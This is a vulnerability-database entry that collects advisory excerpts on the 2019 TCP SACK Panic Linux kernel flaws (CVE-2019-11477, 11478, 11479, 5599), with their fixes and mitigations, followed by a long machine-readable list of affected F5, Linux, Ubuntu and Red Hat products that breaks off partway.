Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXQfrL9zjgjWX9erEAQh8Yw//XDYZhLE+6/G5jELh43MDCVjixj/y8u2b RaMA/eOCJcq1MXV9k5XDruAeZWoMUcCV3OvBi4NIdQ4GXNb0idp3HvXUbAn6yxjh ANslnVZO8XTYFEpxdSGJf2DLVS+uwe+bnfgQQ6BTFJCDEfOAHsPv/d+jZF3qe2Hm WdD//r+U26C23e6Mz9nu1+k3fyScj+UCYCeIWLikKzboB5TmH1KDH7DS0p71JPKE 65I6b7W1ucj0SdvTpQH7VUesww+TM7KZHHwgo0Ydqusf+RoVyYbW3jbZGb+5m5aB tb8v/zaGsXBthKZmH6LCu02P+0Jbou8vEvqCztuwmqDocAeblm3mzeL8FerKCxCp obEEUcjsTbP+RDkNp2qjlfR6V11msl9PzTHXzrQw+7qxZodE9Jhv8Tvm3uTPvbi6 OTD9ez1Hkw5yaWIJBEitGLMxl4HjHaSXOLwbWkoQcEsv1ENmKtvz6wz64zefxljX VBPkLVuLGdwOzOlXHa9Oks3bWiKYUHt36R5sdz+uYL6NTCL5CLv8oUXCN5bYWRlU lCA6f5EYCR3Em8VFChAA51f+i688hmxq4sJwNtvoMVG96FwtVgSmmikb8cFN9+C+ qLlmaaC+b8cZ9COWfw2XAMkrFCYUNt7eL4W/vlZK+GkiYUxEYFZnJAqLXOWFgVpe nLvixkiNDOA=rUVR -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 7) - aarch64, noarch, ppc64le

  1. ========================================================================== Ubuntu Security Notice USN-4041-2 June 29, 2019

linux-lts-xenial, linux-aws, linux-azure update

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel. Unfortunately, the update introduced a regression that interfered with networking applications that setup very low SO_SNDBUF values. This update fixes the problem.

We apologize for the inconvenience. (CVE-2019-11479)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: linux-image-4.15.0-1049-azure 4.15.0-1049.54~14.04.1 linux-image-4.4.0-1048-aws 4.4.0-1048.52 linux-image-4.4.0-154-generic 4.4.0-154.181~14.04.1 linux-image-4.4.0-154-generic-lpae 4.4.0-154.181~14.04.1 linux-image-4.4.0-154-lowlatency 4.4.0-154.181~14.04.1 linux-image-4.4.0-154-powerpc-e500mc 4.4.0-154.181~14.04.1 linux-image-4.4.0-154-powerpc-smp 4.4.0-154.181~14.04.1 linux-image-4.4.0-154-powerpc64-emb 4.4.0-154.181~14.04.1 linux-image-4.4.0-154-powerpc64-smp 4.4.0-154.181~14.04.1 linux-image-aws 4.4.0.1048.49 linux-image-azure 4.15.0.1049.36 linux-image-generic-lpae-lts-xenial 4.4.0.154.135 linux-image-generic-lts-xenial 4.4.0.154.135 linux-image-lowlatency-lts-xenial 4.4.0.154.135 linux-image-powerpc-e500mc-lts-xenial 4.4.0.154.135 linux-image-powerpc-smp-lts-xenial 4.4.0.154.135 linux-image-powerpc64-emb-lts-xenial 4.4.0.154.135 linux-image-powerpc64-smp-lts-xenial 4.4.0.154.135 linux-image-virtual-lts-xenial 4.4.0.154.135

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. The most serious, dubbed “SACK Panic,” allows a remotely-triggered kernel panic on recent Linux kernels.

There are patches that address most of these vulnerabilities. If patches can not be applied, certain mitigations will be effective. We recommend that affected parties enact one of those described below, based on their environment.

Details:

1: CVE-2019-11477: SACK Panic (Linux >= 2.6.29)

Description: A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic.

Fix: Apply the patch PATCH_net_1_4.patch. Additionally, versions of the Linux kernel up to, and including, 4.14 require a second patch PATCH_net_1a.patch.

Workaround #1: Block connections with a low MSS using one of the supplied filters. (The values in the filters are examples. You can apply a higher or lower limit, as appropriate for your environment.) Note that these filters may break legitimate connections which rely on a low MSS. Also, note that this mitigation is only effective if TCP probing is disabled (that is, the net.ipv4.tcp_mtu_probing sysctl is set to 0, which appears to be the default value for that sysctl).

Workaround #2: Disable SACK processing (/proc/sys/net/ipv4/tcp_sack set to 0).

(Note that either workaround should be sufficient on its own. It is not necessary to apply both workarounds.)

2: CVE-2019-11478: SACK Slowness (Linux < 4.15) or Excess Resource Usage (all Linux versions)

Description: It is possible to send a crafted sequence of SACKs which will fragment the TCP retransmission queue. On Linux kernels prior to 4.15, an attacker may be able to further exploit the fragmented queue to cause an expensive linked-list walk for subsequent SACKs received for that same TCP connection.

Fix: Apply the patch PATCH_net_2_4.patch

Workaround #1: Block connections with a low MSS using one of the supplied filters. (The values in the filters are examples. You can apply a higher or lower limit, as appropriate for your environment.) Note that these filters may break legitimate connections which rely on a low MSS. Also, note that this mitigation is only effective if TCP probing is disabled (that is, the net.ipv4.tcp_mtu_probing sysctl is set to 0, which appears to be the default value for that sysctl).

Workaround #2: Disable SACK processing (/proc/sys/net/ipv4/tcp_sack set to 0).

(Note that either workaround should be sufficient on its own. It is not necessary to apply both workarounds.)

3: CVE-2019-5599: SACK Slowness (FreeBSD 12 using the RACK TCP Stack)

Description: It is possible to send a crafted sequence of SACKs which will fragment the RACK send map. An attacker may be able to further exploit the fragmented send map to cause an expensive linked-list walk for subsequent SACKs received for that same TCP connection.

Workaround #1: Apply the patch split_limit.patch and set the net.inet.tcp.rack.split_limit sysctl to a reasonable value to limit the size of the SACK table.

Workaround #2: Temporarily disable the RACK TCP stack.

(Note that either workaround should be sufficient on its own. It is not necessary to apply both workarounds.)

4: CVE-2019-11479: Excess Resource Consumption Due to Low MSS Values (all Linux versions)

Description: An attacker can force the Linux kernel to segment its responses into multiple TCP segments, each of which contains only 8 bytes of data. This drastically increases the bandwidth required to deliver the same amount of data. Further, it consumes additional resources (CPU and NIC processing power). This attack requires continued effort from the attacker and the impacts will end shortly after the attacker stops sending traffic.

Fix: Two patches PATCH_net_3_4.patch and PATCH_net_4_4.patch add a sysctl which enforces a minimum MSS, set by the net.ipv4.tcp_min_snd_mss sysctl. This lets an administrator enforce a minimum MSS appropriate for their applications.

Workaround: Block connections with a low MSS using one of the supplied filters. (The values in the filters are examples. You can apply a higher or lower limit, as appropriate for your environment.) Note that these filters may break legitimate connections which rely on a low MSS. Also, note that this mitigation is only effective if TCP probing is disabled (that is, the net.ipv4.tcp_mtu_probing sysctl is set to 0, which appears to be the default value for that sysctl).

Note:

Good system and application coding and configuration practices (limiting write buffers to the necessary level, monitoring connection memory consumption via SO_MEMINFO, and aggressively closing misbehaving connections) can help to limit the impact of attacks against these kinds of vulnerabilities.

Acknowledgments:

Originally reported by Jonathan Looney.

We thank Eric Dumazet for providing Linux fixes and support.

We thank Bruce Curtis for providing the Linux filters.

We thank Jonathan Lemon and Alexey Kodanev for helping to improve the Linux patches.

We gratefully acknowledge the assistance of Tyler Hicks in testing fixes, refining the information about vulnerable versions, and providing assistance during the disclosure process. 6.6) - x86_64

Bug Fix(es):

  • MDS mitigations not enabled on Intel Skylake CPUs (BZ#1713026)

  • [RHEL6] md_clear flag missing from /proc/cpuinfo (BZ#1713029)

  • RHEL6 kernel does not disable SMT with mds=full,nosmt (BZ#1713044)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201906-1174",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.182"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-iq centralized management",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.127"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "traffix signaling delivery controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-iq centralized management",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.4.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "traffix signaling delivery controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "iworkflow",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "2.3.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "3.1.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-iq centralized management",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-iq centralized management",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.1.11"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
